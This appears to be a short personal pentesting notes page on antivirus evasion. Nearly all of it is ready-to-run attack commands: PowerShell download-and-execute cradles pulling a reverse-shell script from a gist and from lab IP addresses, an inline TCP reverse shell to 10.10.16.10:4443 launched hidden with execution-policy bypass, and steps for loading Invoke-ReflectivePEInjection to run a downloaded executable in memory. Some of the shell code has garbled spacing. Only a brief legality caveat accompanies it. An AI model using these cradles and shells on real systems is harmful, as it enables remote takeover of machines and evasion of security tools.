AV

https://github.com/0xHossam/Killer powershell IEX (New-Object Net.WebClient).DownloadString(‘https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1%27)

powershell -nop -W hidden -noni -ep bypass -c “ $TCPCl i e n t = N e w - O bj ec tN e t . S oc k e t s . TCPCl i e n t (^{'} 10.10.16.10 8^{'}, 4443);$ NetworkStream = $TCPCl i e n t . G e tSt re am ();$ StreamWriter = New-Object IO.StreamWriter( $N e tw or k St re am); f u n c t i o nW r i t e T o St re am ($ String) {[byte[]] $scr i pt : B u ff er = 0..$ TCPClient.ReceiveBufferSize | % {0}; $St re amW r i t er . W r i t e ($ String + ‘SHELL> ’); $StreamWriter.Flush()}WriteToStream '';while(($ BytesRead = $N e tw or k St re am . R e a d ($ Buffer, 0, $Buffer.Length)) -gt 0) {$ Command = ([text.encoding]::UTF8).GetString( $B u ff er, 0,$ BytesRead - 1); $Output = try {Invoke-Expression$ Command 2>&1 | Out-String} catch { $_ | Out-String}WriteToStream ($ Output)}$StreamWriter.Close()”

Transclude of large1.ps1

powershell IEX (New-Object Net.WebClient).DownloadString(‘https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1” -UseBasicParsing) Invoke-mini-reverse.ps1 10.10.15.149 4445

Main{ system(“powershell code here”); }

powershell IEX (New-Object Net.WebClient).DownloadString(‘http://10.10.15.149:80/large.ps1’)

Download PowerSploit:

First, you will need to download the PowerSploit scripts. Specifically, you are interested in Invoke-ReflectivePEInjection. You can download it using the following command:

powershellCopy code

IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.4:53/Invoke-ReflectivePEInjection.ps1')
Download and Execute the Binary In-Memory:

Once Invoke-ReflectivePEInjection is loaded into your PowerShell session, you can download the binary and execute it in-memory like so:

powershellCopy code

$url = "http://example.com/yourfile.exe" $binary = (New-Object Net.WebClient).DownloadData($url) Invoke-ReflectivePEInjection -PEBytes $binary

Please note that these activities are indicative of malicious behavior, and you should only ever execute code in this manner if you have explicit permission to do so, such as part of a penetration test with a signed agreement. Also, using these techniques on networks or systems without consent is illegal and unethical. Be sure you are abiding by all applicable laws and policies before proceeding.

Malleum Knowledge Base

Explorer

AV

Graph View